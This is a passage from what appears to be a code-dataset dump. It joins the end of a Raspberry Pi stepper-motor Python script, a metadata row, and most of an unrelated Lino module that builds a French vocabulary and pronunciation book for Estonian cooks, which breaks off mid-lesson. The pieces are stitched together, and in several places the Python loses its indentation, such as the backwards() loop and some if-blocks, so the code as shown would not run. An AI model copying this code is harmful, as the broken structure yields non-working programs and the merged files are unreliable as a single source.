# time.sleep(delay)
# setStep(1, 0, 1, 1)
# time.sleep(delay)
# setStep(1, 0, 0, 1)
# time.sleep(delay)
# setStep(1, 1, 0, 1)
# time.sleep(delay)
# setStep(0, 1, 0, 1)
# time.sleep(delay)
# setStep(0, 1, 1, 1)
# time.sleep(delay)
# setStep(0, 1, 1, 0)
# time.sleep(delay)
# setStep(1, 1, 1, 0)
# time.sleep(delay)
setStep(1, 0, 1, 0)
time.sleep(delay)
setStep(0, 1, 1, 0)
time.sleep(delay)
setStep(0, 1, 0, 1)
time.sleep(delay)
setStep(1, 0, 0, 1)
time.sleep(delay)
def backwards(delay, steps):
for i in range(0, steps):
setStep(1, 0, 0, 1)
time.sleep(delay)
setStep(0, 1, 0, 1)
time.sleep(delay)
setStep(0, 1, 1, 0)
time.sleep(delay)
setStep(1, 0, 1, 0)
time.sleep(delay)
def setStep(w1, w2, w3, w4):
GPIO.output(coil_A_1_pin, w1)
GPIO.output(coil_A_2_pin, w2)
GPIO.output(coil_B_1_pin, w3)
GPIO.output(coil_B_2_pin, w4)
while True:
#setStep(1,1,1,1)
delay = raw_input("Delay between steps (milliseconds)?")
steps = raw_input("How many steps forward? ")
forward(int(delay) / 1000.0, int(steps))
steps = raw_input("How many steps backwards? ")
backwards(int(delay) / 1000.0, int(steps))
| mit | -9,137,084,050,979,697,000 | 22.75 | 58 | 0.59883 | false | 2.358621 | false | false | false |
MaxTyutyunnikov/lino | lino/modlib/vocbook/fr4et.py | 1 | 64556 | # -*- coding: UTF-8 -*-
## Copyright 2011-2013 Luc Saffre
## This file is part of the Lino project.
## Lino is free software; you can redistribute it and/or modify
## it under the terms of the GNU General Public License as published by
## the Free Software Foundation; either version 3 of the License, or
## (at your option) any later version.
## Lino is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
## GNU General Public License for more details.
## You should have received a copy of the GNU General Public License
## along with Lino; if not, see <http://www.gnu.org/licenses/>.
from __future__ import unicode_literals
import os
import sys
from lino.modlib.vocbook.fr import French, Autre, Nom, NomPropre, Adjectif, Numerique, Verbe, NomGeographique
from lino.modlib.vocbook.et import Estonian
from lino.modlib.vocbook.base import Book, FR, M, F, ET, PRON, GEON, GEOM, GEOF
if __name__ == '__main__':
    if len(sys.argv) != 3:
        raise Exception("""
Usage : %(cmd)s rst OUTPUT_ROOT_DIR
        %(cmd)s odt OUTPUT_FILE
""" % dict(cmd=sys.argv[0]))
    output_format = sys.argv[1]
else:
    output_format = 'rst'
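# Example invocations (the paths are hypothetical; they just follow the
# usage text raised above):
#
#   python fr4et.py rst ./fr4et_rst/
#   python fr4et.py odt ./fr4et.odt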
if output_format == "rst":
    FULL_CONTENT = True
else:
    FULL_CONTENT = False
HAS_FUN = True
HAS_EXERCICES = False
book = Book(French,Estonian,
title="Kutsealane prantsuse keel kokkadele",
input_template=os.path.join(os.path.dirname(__file__),'Default.odt'))
#~ os.path.join(os.path.dirname(__file__),'cfr.odt')
Pronounciation = book.add_section(u"Hääldamine",intro=u"""
Esimeses osas keskendume hääldamisele.
Siin pole vaja näidissõnu meelde jätta,
vaid oluline on, et sa oskaksid neid õigesti hääldades ette lugeda.
""")
Intro = Pronounciation.add_section("Sissejuhatus",intro="""
""")
Eestlastele = Pronounciation.add_section("Eestlastele",intro="""
""")
Pronounciation.add_lesson(u"Hääldamisreeglite spikker", intro=u"""
Hääldamisreeglid:
[ruleslist
ai
ail
ain
an
au
c
cedille
ch
eau
eil
ein
en
ent
er
et
eu
euil
g
gn
gu
h
ien
il
ill
in
j
oi
oe
oin
on
ou
u
ueil
ui
un
y]
""")
Reeglid = Pronounciation.add_section(u"Reeglid",ref="reeglid")
if output_format == "rst":
Reeglid.intro = u"""
Ülevaade:
- [ref u], [ref ou], [ref ui], [ref eu], [ref au], [ref eau], [ref oi], [ref ai], [ref y], [ref oe]
- [ref on], [ref an], [ref en], [ref un], [ref in], [ref ain], [ref ein], [ref ien], [ref oin]
- [ref c], [ref h], [ref ch], [ref cedille]
- [ref er], [ref et], [ref ent]
- [ref j], [ref g], [ref gu], [ref gn]
- [ref il], [ref ill], [ref ail], [ref eil], [ref euil], [ref ueil]
"""
#~ if FULL_CONTENT:
#~ Eesti = Pronounciation.add_section(u"Veel")
#~ Vocabulary = book.add_section(u"Sõnavara",intro=u"""
#~ Teises osa hakkame õpima sõnavara,
#~ oletades et hääldamine on enam vähem selge.
#~ """)
Vocabulary = book
#~ General = Vocabulary.add_section(u"Üldiselt")
General = Vocabulary.add_section(u"Üldine sõnavara")
Kokadele = Vocabulary.add_section(u"Kulinaaria")
if HAS_FUN:
Fun = Vocabulary.add_section(u"Laulud")
if HAS_EXERCICES:
Exercices = Vocabulary.add_section(u"Harjutused")
Intro.add_lesson(u"Tuntud sõnad", intro=u"""
Mõned sõnad, mida sa juba tead.
Tutvumine hääldamiskirjaga.
""")
Intro.parse_words(None,u"""
la soupe [sup] : supp
la carte [kart] : kaart
à la carte [ala'kart] : menüü järgi
le vase [vaaz] : vaas
la douche [duš] : dušš
le disque [disk] : ketas
merci [mär'si] : aitäh
le garage [ga'raaž] : garaaž
le journal [žur'nal] : päevik | ajaleht
""")
Intro.add_after(u"""
Kuna hääldamine on algaja peamine raskus,
tuleb meil seda kuidagi kirja panna.
Seda teeme sõnade taha nurksulgudes (**[]**).
- **ou** hääldatakse **[u]**.
- **e** sõna lõpus kaob ära
""")
Intro.add_lesson(u"Hääldamiskirjeldus", intro=u"""
Hääldamiskirjeldustes kasutame
kohandatud `X-SAMPA
<http://fr.wiktionary.org/wiki/Annexe:Prononciation/fran%C3%A7ais>`_ varianti,
mis on eestlastele intuitiivsem õppida
kui näiteks `IPA
<http://en.wiktionary.org/wiki/Wiktionary:IPA>`_ (International
Phonetic Alphabet).
- Üldiselt loed lihtsalt seda, mis on nurksulgudes.
- Pikad kaashäälikud on topelt.
- Apostroof (') näitab, milline silp on **rõhutatud**.
Prantsuse keeles on rõhk tavaliselt viimasel silbil.
Mõned helid tuleb õppida:
==== ================== ====================== =======================================
täht selgitus näided e.k. näided pr.k.
==== ================== ====================== =======================================
[ə] tumm e Lott\ **e** **je** [žə], **ne** [nə]
[o] kinnine o L\ **oo**\ ne **mot** [mo], **beau** [boo]
[O] avatud o L\ **o**\ tte **bonne** [bOn], **mort** [mOOr]
[ö] kinnine ö l\ **öö**\ ve **feu** [föö], **peu** [pöö]
[Ö] avatud ö ingl.k. "g\ **ir**\ l" **beurre** [bÖÖr], **jeune** [žÖÖn]
[w] pehme w ingl.k. "\ **w**\ ow" **toilettes** [twa'lät], **boudoir** [bud'waar]
[O~] nasaalne [o] - **bonjour** [bO~'žuur], **mon** [mO~]
[A~] nasaalne [O] - **tante** ['tA~tə], **prendre** ['prA~drə]
[Ö~] nasaalne [Ö] - **un** [Ö~], **parfum** [par'fÖ~]
[Ä~] nasaalne [ä] - **chien** [šiÄ~], **rien** [riÄ~]
==== ================== ====================== =======================================
""")
Eestlastele.add_lesson("Mesilashäälikud", intro="""
"Mesilashäälikud" on **s**, **š**, **z** ja **ž**.
Nad on eesti keeles ka olemas, aga prantsuse keeles on
nende erinevus palju olulisem.
=========== ===========================
terav pehme
=========== ===========================
**s**\ upp **z**\ oom
**š**\ okk **ž**\ est
=========== ===========================
""",ref="s")
Eestlastele.parse_words(None,u"""
la soupe [sup] : supp
le garage [ga'raaž] : garaaž
le geste [žäst] : žest | liigutus
le choc [žOk] : šokk | löök
""")
if FULL_CONTENT:
    Eestlastele.parse_words(None,u"""
le genre [žA~rə] : žanr
""")
Intro.add_lesson(u"Artikkel", intro=u"""
Nagu inglise keeles pannakse ka prantsuse keeles nimisõnade ette *artikkel*.
Prantsuse keeles on kõikidel asjadel lisaks oma **sugu**.
Näiteks laud (*la table*) on naissoost,
raamat (*le livre*) on meessoost.
Kui sul on mitu lauda või mitu raamatut,
siis on neil sama artikkel **les**: *les tables* ja *les livres*.
Kui sõna algab täishäälikuga, siis kaob
artiklitest *le* ja *la* viimane
täht ära ja nad muutuvad mõlemad **l'**-ks.
Artiklid *le*, *la* ja *les* nimetatakse **määravaks** artikliteks.
Määrava artikli asemel võib ka olla **umbmäärane** artikkel:
**un** (meessoost), **une** (naissoost) või **des** (mitmus).
Erinevus on nagu inglise keeles, kus on olemas määrav
artikkel **the** ja umbmäärane artikel **a**.
Olenevalt kontekstist kasutatakse kas see või teine.
Näiteks
"I am **a** man from Vigala"
ja
"I am **the** man you need".
Kokkuvõtteks:
========== ============= =============
sugu määrav umbmäärane
========== ============= =============
meessoost **le** [lə] **un** [Ö~]
naissoost **la** [la] **une** [ün]
mitmus **les** [lä] **des** [dä]
========== ============= =============
""")
#~ Intro.parse_words(Autre,u"""
#~ le [lə] : (määrav meessoost artikkel)
#~ la [la] : (määrav naissoost artikkel)
#~ les [lä] : (määrav artikkel mitmus)
#~ """)
#~ Intro.parse_words(Autre,u"""
#~ un [Ö~] : (umbmäärane meessoost artikkel)
#~ une [ün] : (umbmäärane naissoost artikkel)
#~ des [dä] : (umbmäärane artikkel mitmus)
#~ """)
Intro.add_lesson(u"Rõhutud, aga lühike", intro=u"""
Rõhutatud täishäälikud ei ole sellepärast tingimata pikad.
Prantsuse keeles tuleb tihti ette, et sõna lõpeb *lühikese* täishäälikuga.
""")
Intro.parse_words(Nom,u"""
le menu [mə'nü] : menüü
le chocolat [šoko'la] : šokolaad
le plat [pla] : roog | kauss
le cinéma [sine'ma] : kino
le paradis [para'di] : paradiis
""")
Intro.add_lesson(u"O on kinnine või avatud", u"""
Helid **[o]** ja **[ö]** on eesti keeles alati *kinnised*.
Prantsuse keeles on lisaks ka *avatud* vormid.
Hääldamiskirjelduses on kinnine vorm **väikese** tähega ja
avatud vorm **suure** tähega.
""")
Intro.parse_words(Autre,u"""
je donne [dOn] : ma annan
je dors [dOOr] : ma magan
""")
Intro.parse_words(Nom,u"""
le dos [do] : selg
le mot [mo] : sõna
le tome [toom] : köide
""")
if FULL_CONTENT:
    Intro.parse_words(Nom,u"""
la mort [mOOr] : surm
le or [OOr] : kuld
le boulot [bu'lo] : töö (kõnekeel)
le bouleau [bu'loo] : kask
le bureau [bü'roo] : büroo
""")
if not FULL_CONTENT:
Eestlastele.add_lesson(u"Cold gold, big pigs and downtowns", u"""
Erinevus tugeva ja nõrda K, P või T vahel on prantsuse keeles sama
oluline nagu inglise ja saksa keeles.
""",ref="kpt")
    Eestlastele.parse_words(Autre,u"""
la gare [gaar] : raudteejaam
le car [kaar] : reisibuss
la bière [bjäär] : õlu
la pierre [pjäär] : kivi
le doigt [dwa] : sõrm
le toit [twa] : katus
""")
else:
Eestlastele.add_lesson(u"b ja p", u"""
b ja p on prantsuse keeles selgelt erinevad.
""")
    Eestlastele.parse_words(None,u"""
la bière [bjäär] : õlu
la pierre [pjäär] : kivi
le bon [bO~] : tšekk | talong
le pont [pO~] : sild
le bon ton [bO~'tO~] : viisakus
le ponton [pO~'tO~] : pontoon (nt. pontoonsild)
la peau [poo] : nahk
beau (m.) : ilus
le bois [bwa] : puu (materjal) | mets
le poids [pwa] : kaal
""")
Eestlastele.add_lesson(u"d ja t", u"""
d ja t on prantsuse keeles selgelt erinevad.
""")
    Eestlastele.parse_words(None,u"""
le don [dO~] : annetus
le ton [tO~] : toon
le centre ['sA~trə] : keskus
la cendre ['sA~drə] : tuhk
je donne [dOn] : ma annan
la tonne [tOn] : tonn
le toit [twa] : katus
le doigt [dwa] : sõrm
""")
Eestlastele.add_lesson(u"g ja k", u"""
g ja k on prantsuse keeles selgelt erinevad.
""")
    Eestlastele.parse_words(None,u"""
le gond [gO~] : uksehing
le con [kO~] : loll
la gare [gaar] : raudteejaam
le car [kaar] : reisibuss
car [kaar] : sest
le garçon [gar'sO~] : poiss
Qui est Guy? [ki ä gi] : Kes on Guy?
""")
Reeglid.add_lesson(u"u", intro=u"""
**u** (siis kui see pole teise täishäälikuga koos)
hääldatakse **[ü]** või **[üü]**.
""",ref="u")
Reeglid.parse_words(Nom,u"""
le bureau [bü'roo] : büroo
le bus [büs] : buss
# le mur [müür] : sein | müür
la puce [püs] : kirp
le jus [žü] : mahl
# le but [büt] : eesmärk
# la pute [püt] : hoor
le sucre ['sükrə] : suhkur
""")
Reeglid.add_lesson(u"ou", intro=u"""
**ou** hääldatakse **[u]** või **[uu]**.
""",ref="ou")
Reeglid.parse_words(None,u"""
le journal [žur'nal] : päevik | ajaleht
le cours [kuur] : kursus | tund (koolis)
le cou [ku] : kael
le goût [gu] : maitse
""")
Reeglid.add_lesson(u"ui",
u"""
**ui** hääldatakse **[wi]** või **[wii]** (mida
kirjutatakse vahest ka **[üi]** või **[üii]**).
""",ref="ui")
Reeglid.parse_words(None,u"""
la suite [swit] : järg | tagajärg | rida, kord | saatjaskond
bonne nuit [bOnə 'nwi] : head ööd
la cuisine [kwi'zin] : köök
je cuis [žə kwi] : ma keedan
je suis [žə swi] : ma olen | ma järgnen
""")
Reeglid.add_lesson(u"eu", u"""
**eu** hääldatakse **[öö]** või **[ÖÖ]**.
""",ref="eu")
Reeglid.parse_words(None,u"""
le feu [föö] : tuli
# le neveu [nə'vöö] : onupoeg | tädipoeg
je veux [žə vöö] : ma tahan
""")
Reeglid.parse_words(Autre,u"""
# neutre (mf) ['nöötrə] : neutraalne
""")
Reeglid.parse_words(Numerique,u"""
neuf [nÖf] : üheksa
""")
Reeglid.parse_words(Nom,u"""
le professeur [profe'sÖÖr] : professor
le beurre [bÖÖr] : või
la peur [pÖÖr] : hirm
""")
#~ Reeglid.parse_words(None,u"""
#~ l'huile (f) [wil] : õli
#~ cuire [kwiir] : keetma
#~ suivre ['swiivrə] : järgima
#~ la cuillère [kwi'jäär] : lusikas
#~ """)
Reeglid.add_lesson(u"au",
intro=u"""
**au** hääldatakse **[o]** või **[oo]**.
""",ref="au")
Reeglid.parse_words(None,u"""
une auberge [o'bäržə] : võõrastemaja
un auteur [o'tÖÖr] : autor
""")
Reeglid.add_lesson(u"eau",
intro=u"""
**eau** hääldatakse **[oo]**.
Nagu [ref au], aga **e** ühineb nendega ja kaob ära.
""",ref="eau")
Reeglid.parse_words(None,u"""
le château [ša'too] : loss
le bateau [ba'too] : laev
la eau [oo] : vesi
""")
Reeglid.add_lesson(u"oi",
u"""
**oi** hääldatakse **[wa]**.
Vaata ka [ref oin].
""",ref="oi")
Reeglid.parse_words(Autre,u"""
voilà [vwa'la] : näe siin
trois [trwa] : kolm
bonsoir [bO~'swaar] : head õhtut
au revoir [orə'vwaar] : nägemiseni
""")
Reeglid.parse_words(Nom,u"""
le roi [rwa] : kuningas
la loi [lwa] : seadus
la toilette [twa'lät] : tualett
""")
Reeglid.add_lesson(u"ai",
u"""
**ai** hääldatakse **[ä]** või **[ää]**
(mõnikord ka **[ə]**).
""",ref="ai")
Reeglid.parse_words(Nom,u"""
la maison [mä'zO~] : maja
le domaine [do'mään] : domeen
la fraise [frääz] : maasikas
# la paire [päär] : paar
""")
Reeglid.parse_words(Adjectif,u"""
frais [frä] | fraîche [fräš] : värske
""")
Reeglid.parse_words(None,u"""
nous faisons [nu fə'zO~] : meie teeme
le faisan [fə'zA~] : faasan
""")
Reeglid.add_lesson(u"y", u"""
**y** hääldatakse alati **[i]** ja mitte kunagi **[ü]**.
""",ref="y")
Reeglid.parse_words(Nom,u"""
le cygne ['sinjə] : luik
le système [sis'tääm] : süsteem
le mythe [mit] : müüt
""")
Reeglid.add_lesson(u"œ", u"""
**œ** hääldatakse alati **[ÖÖ]**.
""",ref="oe")
Reeglid.parse_words(Nom,u"""
# le nœud [nöö] : sõlm
le cœur [kÖÖr] : süda
#le chœur [kÖÖr] : koor (laulu-)
le bœuf [bÖff] : härg
le œuf [Öf] : muna
la œuvre [ÖÖvrə] : töö, teos
le *hors d'œuvre [hOOr 'dÖÖvrə] : eelroog
""")
if HAS_FUN:
Fun.add_lesson(u"Frère Jacques", u"""
| Frère Jacques, frère Jacques,
| dormez-vous? Dormez-vous?
| Sonnez les matines, sonnez les matines
| ding, dang, dong! Ding, dang, dong!
""")
    Fun.parse_words(NomPropre,u"""
Jacques [žaak] : Jaak
""")
    Fun.parse_words(None,u"""
le frère [fräär] : vend
dormez-vous? [dOrmee'vu] : kas Te magate?
Sonnez les matines [sO'ne lä ma'tinə] : lööge hommikukellad
""")
Fun.add_lesson(u"Dans sa maison un grand cerf ", u"""
| Dans sa maison un grand cerf
| regardait par la fenêtre
| un lapin venir à lui
| et frapper ainsi.
| «Cerf, cerf, ouvre-moi
| ou le chasseur me tuera!»
| «Lapin, lapin entre et viens
| me serrer la main.»
""")
    Fun.parse_words(Verbe,u"""
il regardait [rəgar'dä] : ta vaatas
""")
    Fun.parse_words(None,u"""
ouvre-moi [uuvrə'mwa] : tee mulle lahti
ou [u] : või
il me tuera [il mə tüə'ra] : ta tapab mind
serrer [sä'ree] : suruma
grand [grA~] | grande [grA~də] : suur
""")
    Fun.parse_words(Nom,u"""
la maison [mä'zO~] : maja
le cerf [säär] : hirv
la fenêtre [fə'näätrə] : aken
le lapin [la'pÄ~] : küülik
le chasseur [ša'sÖÖr] : jahimees
la main [mÄ~] : käsi
""")
Fun.add_lesson(u"Un kilomètre à pied", u"""
| Un kilomètre à pied,
| ça use, ça use,
| un kilomètre à pied,
| ça use les souliers.
""")
    Fun.parse_words(None,u"""
le pied [pjee] : jalaots
à pied [a'pjee] : jalgsi
ça use [sa 'üüzə] : see kulutab
le soulier [sul'jee] : king
""")
Fun.add_lesson(u"La peinture à l'huile", u"""
| La peinture à l'huile
| c'est bien difficile
| mais c'est bien plus beau
| que la peinture à l'eau
""")
    Fun.parse_words(None,u"""
la peinture [pÄ~'tüür] : värvimine
la huile [wilə] : õli
la eau [oo] : vesi
difficile [difi'silə] : raske
mais [mä] : aga
beau [boo] | belle [bälə] : ilus
plus beau [plü boo] : ilusam
""")
if HAS_FUN:
Fun.add_lesson(u"Meunier, tu dors", u"""
| Meunier, tu dors, ton moulin va trop vite.
| Meunier, tu dors, ton moulin va trop fort.
| Ton moulin, ton moulin va trop vite.
| Ton moulin, ton moulin va trop fort.
""")
    Fun.parse_words(None,u"""
le meunier [mÖn'jee] : mölder
le moulin [mu'lÄ~] : veski
tu dors [dOOr] : sa magad
trop vite [tro'vitə] : liiga kiiresti
trop fort [tro'fOOr] : liiga kõvasti
""")
if HAS_FUN and FULL_CONTENT:
Fun.add_lesson(u"Minu onu...",
u"""
| Mon tonton et ton tonton sont deux tontons,
| mon tonton tond ton tonton
| et ton tonton tond mon tonton.
| Qu'est-ce qui reste?
""")
    Fun.parse_words(None,u"""
mon [mO~] : minu
ton [tO~]: sinu
ils sont [sO~] : nad on
""")
    Fun.parse_words(Numerique,u"""
deux [döö] : kaks
""")
    Fun.parse_words(Nom,u"""
le tonton [tO~'tO~] : onu
""")
    Fun.parse_words(Verbe,u"""
tondre [tO~drə] : pügama
rester [räs'tee] : üle jääma
""")
    Fun.parse_words(None,u"""
Qu'est-ce qui reste? [käski'räst?] : Mis jääb üle?
""")
#~ """
#~ le nôtre ['nootrə] : meie oma
#~ """
Reeglid.add_lesson(u"on & om",
u"""
**on** ja **om** hääldatakse **[O~]**,
v.a. siis kui järgneb täishäälik või teine **n** või **m**.
""",ref="on")
Reeglid.parse_words(Nom,u"""
le salon [sa'lO~] : salong (= uhke tuba)
# un oncle [O~klə] : onu
la bombe ['bO~mbə] : pomm
""")
Reeglid.parse_words(Autre,u"""
bonjour [bO~'žuur] : tere | head päeva | tere hommikust
bonne nuit [bOnə 'nwi] : head ööd
bon appétit [bOnappe'ti] : head isu
""")
Reeglid.add_lesson(u"an & am",
u"""
**an** ja **am** hääldatakse **[A~]**,
v.a. siis kui järgneb täishäälik või teine **n** või **m**.
""",ref="an")
Reeglid.parse_words(Nom,u"""
le an [A~] : aasta
la année [a'nee] : aasta
la lampe [lA~p] : lamp
le enfant [A~'fA~] : laps
""")
Reeglid.add_lesson(u"en & em",
u"""
**en** ja **em** hääldatakse **[A~]**,
v. a. siis kui järgneb täishäälik või teine **n** või **m**.
""",ref="en")
Reeglid.parse_words(Nom,u"""
le rendez-vous [rA~de'vu] : kohtumine
# le commentaire [komA~'täär] : märkus, kommentar
le centre ['sA~trə] : keskus
le renne [rän] : põhjapõder
# le genre [žA~rə] : žanre
un enfant [A~'fA~] : laps
le employeur [A~plwa'jÖÖr] : tööandja
""")
Reeglid.add_lesson(u"un & um",
u"""
**um** ja **un** hääldatakse **[Ö~]**,
v.a. siis kui järgneb täishäälik või teine **m** / **n**.
""",ref="un")
Reeglid.parse_words(NomPropre,u"""
Verdun [vär'dÖ~] : -
""")
Reeglid.parse_words(Nom,u"""
le parfum [par'fÖ~] : hea lõhn v. maitse
""")
Reeglid.parse_words(Adjectif,u"""
parfumé [parfü'mee] | parfumée [parfü'mee] : lõhnastatud
brun [brÖ~] | brune [brün] : pruun
# aucun [o'kÖ~] | aucune [o'kün] : mitte üks
""")
#~ chacun [ža'kÖ~] | chacun [ža'kün] : igaüks
Reeglid.add_lesson(u"in & im",
u"""
**in** ja **im** hääldatakse **[Ä~]**,
v.a. siis kui järgneb täishäälik või teine **n** või **m**.
Vaata ka [ref ain].
""",ref="in")
Reeglid.parse_words(None,u"""
la information [Ä~formasjO~] : informatsioon
le imperméable [Ä~pärme'aablə] : vihmajope
la image [i'maaž] : pilt
le vin [vÄ~]: vein
le bassin [ba'sÄ~] : bassein
le dessin [de'sÄ~] : joonistus
je dessine [de'sin] : ma joonistan
""")
Reeglid.parse_words(Adjectif,u"""
inutile (mf) [inü'til] : kasutu
""")
#~ Reeglid.add_lesson(u"ain, aim, ein, eim",
#~ u"""
#~ Kui **a** või **e** on **in**/**im** ees,
#~ siis see sulab nendega kokku ja kaob ära.
#~ """,ref="ain")
#~ Reeglid.parse_words(Nom,u"""
#~ le pain [pÄ~] : sai | leib
#~ le gain [gÄ~] : kasu
#~ la main [mÄ~] : käsi
#~ la faim [fÄ~] : nälg
#~ """)
#~ Reeglid.parse_words(NomPropre,u"""
#~ Reims [rÄ~s] : (linn)
#~ """)
Reeglid.add_lesson(u"ain & aim",
u"""
**ain** ja **aim** hääldatakse **[Ä~]**. **a** ühineb **in**/**im**-ga ja kaob ära.
Sama loogika nagu [ref ein].
""",ref="ain")
Reeglid.parse_words(Nom,u"""
le pain [pÄ~] : sai | leib
# le gain [gÄ~] : kasu
la main [mÄ~] : käsi
la faim [fÄ~] : nälg
""")
Reeglid.add_lesson(u"ein & eim",
u"""
**ein** ja **eim** hääldatakse **[Ä~]**. **e** ühineb **in**/**im**-ga ja kaob ära.
Sama loogika nagu [ref ain].
""",ref="ein")
Reeglid.parse_words(Nom,u"""
le rein [rÄ~] : neer (anat.)
la reine [rään] : kuninganna
""")
Reeglid.parse_words(NomPropre,u"""
Reims [rÄ~s] : (linn)
""")
Reeglid.add_lesson(u"ien",
u"""
**ien** hääldatakse **[jÄ~]** v.a. siis kui järgneb teine **n**.
""",ref="ien")
Reeglid.parse_words(None,u"""
le chien [šiÄ~] : koer
la chienne [šjän] : emakoer
""")
Reeglid.parse_words(Autre,u"""
bien [biÄ~] : hästi
rien [riÄ~] : ei midagi
""")
Reeglid.add_lesson(u"oin",
u"""
**oin** hääldatakse **[wÄ~]**.
Reegel [ref oi] ei kehti sel juhul, sest *i* sulab *n*-iga kokku.
""",ref="oin")
Reeglid.parse_words(None,u"""
# le coin [kwÄ~] : nurk
le point [pwÄ~] : punkt
""")
Reeglid.parse_words(Autre,u"""
besoin [bə'zwÄ~] : vaja
# loin [lwÄ~] : kauge
""")
Reeglid.add_lesson(u"c", u"""
**c** hääldatakse **[s]** siis
kui järgneb **e**, **i** või **y**,
ja muidu **[k]** (ja mitte kunagi **[tš]**).
Sõna lõpus kaob mõnikord ära.
""",ref="c")
Reeglid.parse_words(None,u"""
la casserole [kas'roll] : kastrul
la confiture [kO~fi'tüür] : moos | keedis
la cuisse [kwis] : reis | kints
le certificat [särtifi'ka] : tsertifikaat
la cire [siir] : vaha
le centre ['sA~trə] : keskus
le cygne ['sinjə] : luik
la classe [klas] : klass
le tabac [ta'ba] : tubak
""")
Reeglid.parse_words(NomPropre,u"""
octobre [ok'tOObrə] : oktoober
Marc [mark] : Markus
""")
Reeglid.parse_words(Numerique,u"""
cinq [sÄ~k] : viis
""")
if FULL_CONTENT:
Reeglid.parse_words(None,u"""
le câble ['kaablə] : kaabel
la cible ['siiblə] : märklaud
la comédie [kome'dii] : komöödia
le comble ['kO~blə] : kõrgeim v. ülim aste
la cure [küür] : kuur
la croûte [krut] : koorik
un acacia [akasj'a] : akaatsia (põõsas)
""")
Reeglid.add_lesson(u"h", u"""
**h** ei hääldata kunagi.
""",ref="h")
#~ (Vaata ka [ref haspire])
Reeglid.parse_words(Nom,u"""
le hélicoptère [elikop'täär] : helikopter
le hôtel [o'täl] : hotell
le autel [o'täl] : altar
""")
if FULL_CONTENT:
Reeglid.add_lesson(u"h aspiré", u"""
Kuigi **h** ei hääldata kunagi ([vt. [ref h]]),
on neid kaks tüüpi: «h muet» (tumm h)
ja «h aspiré» (sisse hingatud h).
Viimane tähistatakse sõnaraamatutes tärniga (*).
Erinevus koosneb selles, kuidas eesolev sõna liitub nendega.
""",ref="haspire")
Reeglid.parse_words(Nom,u"""
le hélicoptère [elikop'täär] : helikopter
le hôtel [o'täl] : hotell
le homme [Om] : mees
le *haricot [ari'ko] : uba
le *héros [e'ro] : kangelane
le *hibou [i'bu] : öökull
""")
Reeglid.add_lesson(u"ch", u"""
**ch** hääldatakse tavaliselt **[š]** ja mõnikord (kreeka päritolu sõnades) **[k]**,
ja mitte kunagi **[tš]**.
""",ref="ch")
Reeglid.parse_words(Nom,u"""
le chat [ša] : kass
la biche [biš] : emahirv
le chœur [kÖÖr] : koor (laulu-)
le psychologue [psiko'lOOgə] : psühholoog
""")
"""
la chèvre ['šäävrə] : kits
la chambre [šA~mbrə] : tuba
le parachute [para'šüt] : langevari
le Christe [krist] : Kristus
une chope [žOp] : õlu
le chien [šjÄ~] : koer
un achat [a'ša] : ost
"""
Reeglid.add_lesson(u"ç", u"""
**ç** hääldatakse alati **[s]**.
""",ref="cedille")
Reeglid.parse_words(None,u"""
la leçon [lə'sO~] : lektsioon
# la rançon [rA~sO~]: lunaraha
le reçu [rə'sü] : kviitung
le maçon [ma'sO~] : müürsepp
""")
Reeglid.add_lesson(u"-er & -ez",
u"""
**-er** ja **-ez** sõna lõpus hääldatakse **[ee]**.
""",ref="er")
Reeglid.parse_words(None,u"""
manger [mA~'žee] : sööma
vous mangez [mA~'žee] : te sööte
aimer [ä'mee] : armastama
vous aimez [ä'mee] : te armastate
""")
Reeglid.add_lesson(u"-et",
u"""
**-et** sõna lõpus hääldatakse **[ä]**.
""",ref="et")
Reeglid.parse_words(None,u"""
le fouet [fu'ä] : vispel
le fumet [fü'mä] : hea lõhn (nt. veini, liha kohta)
""")
Reeglid.add_lesson(u"-ent",
u"""
**-ent** sõna lõpus hääldatakse **[ə]** siis kui tegemist
on *tegusõna kolmanda isiku mitmuse vormiga*.
Muidu kehtib reegel [ref en] (hääldatakse **[A~]**).
""",ref="ent")
Reeglid.parse_words(None,u"""
ils couvent [il 'kuuvə] : nad munevad
le couvent [ku'vA~] : klooster
souvent [su'vA~] : tihti
""")
Reeglid.add_lesson(u"j",
u"""
**j** hääldatakse **[ž]** (ja mitte [dž]).
""",ref="j")
Reeglid.parse_words(None,u"""
majeur [mažÖÖr] : suurem
je [žə] : mina
jamais [ža'mä] : mitte iialgi
""")
Reeglid.parse_words(NomPropre,u"""
Josephe [žo'zäf] : Joosep
""")
Reeglid.add_lesson(u"g",
u"""
**g** hääldatakse **[g]** kui järgneb **a**, **o**, **u**
või kaashäälik, aga **[ž]** kui järgneb **e**, **i** või **y**.
""",ref="g")
Reeglid.parse_words(None,u"""
le gorille [go'rijə] : gorilla
la gazelle [ga'zäl] : gasell
la girafe [ži'raf] : kaelkirjak
# le gymnase [žim'naaz] : gümnaasium
# le juge [žüüž] : kohtunik
# la géologie [žeolo'žii] : geoloogia
général [žene'ral] : üldine
le général [žene'ral] : generaal
""")
Reeglid.add_lesson(u"gu",
u"""
**gu** hääldatakse **[g]** (s.t. **u** kaob ära)
siis kui järgneb **e**, **i** või **y**.
""",ref="gu")
Reeglid.parse_words(None,u"""
le guépard [ge'paar] : gepard
le guide [giid] : reisijuht
la guitare [gi'taar] : kitarr
la guerre [gäär] : sõda
Guy [gi] : (eesnimi)
Gustave [güs'taav] : (eesnimi)
aigu [ä'gü] : terav, ...
""")
Reeglid.add_lesson(u"gn", u"""
**gn** hääldatakse **[nj]**.
""",ref="gn")
Reeglid.parse_words(None,u"""
magnifique (mf) [manji'fik] : suurepärane
le cognac [kon'jak] : konjak
le signal [sin'jal] : signaal
""")
#~ Reeglid.parse_words(Verbe,u"""
#~ soigner [swan'jee] : ravima | hoolitsema
#~ """)
Reeglid.parse_words(NomGeographique,u"""
Avignon [avin'jO~] : -
""")
#~ """
#~ la ligne ['linjə] : liin | rida
#~ le signe ['sinjə] : märk
#~ la besogne [bə'zOnjə] : töö | tegu | ülesanne
#~ """
Reeglid.add_lesson(u'il',
u"""
**il** (sõna lõpus ja kaashääliku taga)
hääldatakse kas **[i]** või **[il]**.
""",ref="il")
Reeglid.parse_words(None,u"""
il [il] : tema
le persil [pär'sil] : petersell
le outil [u'ti] : tööriist
# le fusil [fü'zi] : püss
subtil (m) [süp'til] : peen, subtiilne
gentil (m) [žA~'ti] : armas
# le exil [äg'zil] : eksiil
""")
Reeglid.add_lesson(u"ill", u"""
**ill** hääldatakse **[iij]** või **[ij]**.
Erandid on sõnad *ville* ja *mille*.
